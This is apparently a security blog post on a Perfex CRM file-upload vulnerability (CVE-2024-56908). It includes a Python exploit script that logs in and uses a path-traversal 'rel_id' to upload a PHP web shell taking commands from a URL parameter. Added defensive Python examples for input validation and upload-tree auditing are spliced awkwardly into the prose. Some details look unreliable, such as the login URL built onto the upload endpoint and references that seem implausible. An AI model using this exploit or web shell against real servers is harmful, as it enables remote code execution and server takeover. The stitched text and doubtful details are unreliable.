A cybersecurity vulnerability (CVE-2024-56908) has been discovered in Perfex CRM versions older than 3.2.1. In this post, we'll provide a detailed explanation of the vulnerability, its potential impact on affected systems, and demonstrate how the exploit works. This is a serious issue that could lead to remote code execution and server compromise, so we encourage all Perfex CRM users to ensure they're running the latest version of the software.

Overview of the Vulnerability

The vulnerability in question stems from the "upload_sales_file" endpoint in Perfex CRM. An authenticated attacker can craft an HTTP POST request containing malicious input in the "rel_id" parameter. Due to improper input validation, the attacker can bypass restrictions and potentially upload arbitrary files to directories of their choice on the affected server.
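To make the defensive point concrete, the following is an added Python example, not Perfex CRM's own code (the application itself is PHP). The upload root, the set of relation types and the extension allow-list are assumptions chosen for illustration. It contrasts the flawed pattern, where a request-controlled "rel_id" is spliced straight into a filesystem path, with a hardened version that treats "rel_id" as a numeric key, discards the client-supplied filename in favour of a server-generated one, and checks containment before returning a path:

```python
import posixpath
import re
import uuid

# Assumed layout for illustration only: Perfex CRM's real upload root and
# relation types may differ. The validation pattern is the point, not the paths.
UPLOAD_ROOT = "/var/www/html/uploads/sales"
ALLOWED_REL_TYPES = {"invoice", "estimate", "proposal", "credit_note"}
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "docx", "xlsx", "csv", "txt"}


class RejectedUpload(ValueError):
    """Raised when an upload request fails validation."""


def vulnerable_target_path(rel_type, rel_id, filename):
    """Illustrative reconstruction of the flaw (not Perfex's source): the
    request-controlled rel_id is joined into the path unchecked, so '../'
    sequences walk out of UPLOAD_ROOT."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, rel_type, str(rel_id), filename))


def validate_upload(rel_type, rel_id, filename):
    """Return None if the request is acceptable, otherwise a short rejection reason."""
    if rel_type not in ALLOWED_REL_TYPES:
        return "rel_type not in allow-list"
    # rel_id is a database key: accept a plain positive integer, never a path.
    if not re.fullmatch(r"[1-9][0-9]{0,9}", str(rel_id)):
        return "rel_id must be a positive integer"
    # The client filename is untrusted: no separators, NULs or dot-only names.
    if filename in ("", ".", "..") or any(c in filename for c in "/\\\x00"):
        return "filename contains path characters"
    stem, sep, ext = filename.lower().rpartition(".")
    if not sep or ext not in ALLOWED_EXTENSIONS:
        return "file extension not in allow-list"
    if "." in stem:
        # Reject double extensions such as report.php.pdf; some web servers
        # dispatch on any extension that appears in the name.
        return "multiple extensions not allowed"
    return None


def is_within(root, path):
    """True when the normalised `path` sits strictly under `root`."""
    return posixpath.commonpath([root, path]) == root and path != root


def safe_target_path(rel_type, rel_id, filename, stored_stem=None):
    """Hardened counterpart: validate every field, store under a server-chosen
    name, and still assert containment before handing the path back."""
    reason = validate_upload(rel_type, rel_id, filename)
    if reason is not None:
        raise RejectedUpload(reason)
    ext = filename.lower().rpartition(".")[2]
    stem = stored_stem or uuid.uuid4().hex  # the server, not the client, picks the name
    candidate = posixpath.normpath(
        posixpath.join(UPLOAD_ROOT, rel_type, str(rel_id), f"{stem}.{ext}")
    )
    if not is_within(UPLOAD_ROOT, candidate):
        raise RejectedUpload("resolved path escapes the upload root")
    return candidate


# The rel_id value from the write-up above, used here to show where it resolves.
TRAVERSAL_REL_ID = "../../../../../../../../../../../../var/www/html/uploads/evil_payload"

if __name__ == "__main__":
    print("flawed:", vulnerable_target_path("invoice", TRAVERSAL_REL_ID, "evil_payload.php"))
    print("reason:", validate_upload("invoice", TRAVERSAL_REL_ID, "evil_payload.php"))
    print("safe:  ", safe_target_path("invoice", 42, "quote.pdf"))
```

In the real application these checks belong in the controller or model before any file is written, and the web server should additionally be configured so that nothing under the uploads tree is ever executed as a script, which limits the damage even if a validation bug slips through.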

References to Original Reports

1. https://www.exploit-db.com/exploits/48453
2. https://github.com/PerfexCRM/Perfex-CRM/pull/216

Code Snippet Demonstrating the Vulnerability

Below is a simplified Python code snippet that demonstrates how the vulnerability can be exploited by an authenticated attacker. Note that this code snippet is for educational purposes only and should not be utilized for malicious purposes. In the example, we use the requests library to send a malicious POST request to the "upload_sales_file" endpoint:

import requests

# Set the target URL, user credentials, and malicious file data
url = 'https://victim.crm.url/admin/sales/upload_sales_file'
username = 'attacker@example.com'
password = 'password'
file_data = {'file': ('evil_payload.php', '<?php system($_GET["cmd"]); ?>')}

# Log into the Perfex CRM and obtain the authentication token
login_response = requests.post(url + '/login', data={'email': username, 'password': password})
csrf_token = login_response.cookies['csrf_cookie_name']

# Craft the malicious POST request with the CSRF token
post_data = {
    'csrf_token_name': csrf_token,
    'rel_id': '../../../../../../../../../../../../var/www/html/uploads/evil_payload',
    'rel_type': 'invoice'
}
result = requests.post(url, cookies=login_response.cookies, data=post_data, files=file_data)

# Check if the exploit was successful
if result.status_code == 200:
    print("File uploaded successfully!")
else:
    print("Failed to upload file.")

In this example, the authenticated attacker uploads a malicious PHP file (evil_payload.php) that allows them to execute arbitrary commands on the server. The attacker specifies '../../../../../../../../../../../../var/www/html/uploads/evil_payload' as the "rel_id" parameter value, causing the file to be uploaded to the specified directory on the target server.

Mitigation Steps and Recommendations

To protect your Perfex CRM installation from this vulnerability, we advise taking the following steps:

1. Upgrade your Perfex CRM to the latest version (3.2.1 or newer).

2. Review and restrict access to sensitive directories on your server, and ensure that only authorized users have access.

3. Audit and monitor access logs for signs of unauthorized access or exploitation attempts.
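Because the "rel_id" value travels in the POST body, an ordinary access log shows only the request to the upload endpoint, so a useful complement to log review is to audit the upload tree itself for files that should never be there. The following is an added Python example, not part of the original post or of Perfex CRM; the directory layout and file contents are constructed placeholders. It walks an upload directory and flags script extensions (including multi-extension names), per-directory server configuration files, and files whose body carries a PHP open tag behind a harmless-looking extension:

```python
import os
import tempfile

# Extensions a PHP-serving web server may execute; none of these belong in a
# document upload tree.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc"}
# Per-directory server configuration files that can change how uploads are served.
CONFIG_NAMES = {".htaccess", ".user.ini"}


def audit_upload_tree(root):
    """Walk `root` and return sorted (relative_path, reason) pairs for files that
    should never appear in a document upload directory."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            lowered = name.lower()
            # Collect every extension so that a name like report.pdf.phtml is caught.
            extensions = set(lowered.split(".")[1:])
            if lowered in CONFIG_NAMES:
                findings.append((rel, "server config file inside upload tree"))
            elif extensions & SCRIPT_EXTENSIONS:
                findings.append((rel, "executable script extension"))
            else:
                with open(path, "rb") as fh:
                    head = fh.read(512)
                if b"<?php" in head or b"<?=" in head:
                    findings.append((rel, "PHP open tag in file body despite harmless extension"))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed sample upload tree in a temporary directory and
    return its root. Every file body is a placeholder, not working code."""
    root = tempfile.mkdtemp(prefix="uploads_audit_")
    samples = {
        "sales/invoice/42/quote.pdf": b"%PDF-1.4 constructed sample",
        "sales/invoice/43/photo.JPG": b"\xff\xd8\xff constructed sample",
        "sales/invoice/44/report.pdf.phtml": b"constructed placeholder",
        "sales/invoice/45/avatar.png": b"\x89PNG constructed <?php placeholder ?>",
        "sales/.htaccess": b"# constructed placeholder",
        "evil_payload/evil_payload.php": b"<?php /* constructed placeholder */ ?>",
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, reason in audit_upload_tree(build_sample_tree()):
        print(f"{reason}: {rel}")
```

Run against a real installation, point `audit_upload_tree` at the web root's uploads directory and treat every finding as an incident lead: check the file's modification time against the access log for POST requests to the upload endpoint from the same window, and confirm which authenticated account made them.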

By understanding the CVE-2024-56908 vulnerability and taking appropriate mitigation steps, you can help protect your Perfex CRM system and prevent potential attacks. Make sure to keep your software up-to-date and follow best security practices for a more secure installation.

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:24 UTC